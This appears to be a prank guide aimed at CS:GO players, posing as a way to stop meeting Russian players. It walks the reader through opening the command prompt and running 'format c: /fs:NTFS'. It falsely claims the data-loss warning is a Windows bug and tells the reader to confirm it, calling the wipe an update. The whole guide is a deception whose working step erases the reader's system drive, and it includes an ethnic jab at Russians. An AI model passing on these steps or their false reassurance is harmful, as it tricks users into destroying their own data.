So you're playing a game and something annoys you, in this case, it's Russians in CS:GO. So what you're going to want to do is to hold the Windows key and tap the R key. Doing that should open a new window, type cmd in the box so it looks something like this.

After pressing enter, a window entitled "Command Prompt" should appear, it will look like this (but more modern and fancy looking): You then type "format c: /fs:NTFS" without the quote marks, due to a bug in Windows, it will say all data will be lost but don't worry, it won't get lost. Because of the bug, it asks for confirmation of whether you want to perform the action or not, just type the letter Y and press Enter. Move on to Step 3.

After following the 2 prior steps, your Command Prompt window should look like this: Your PC needs to be left alone for an important update to finish. It should shut down when complete, upon restarting, you shouldn't have to deal with Russians until you play Matchmaking again.
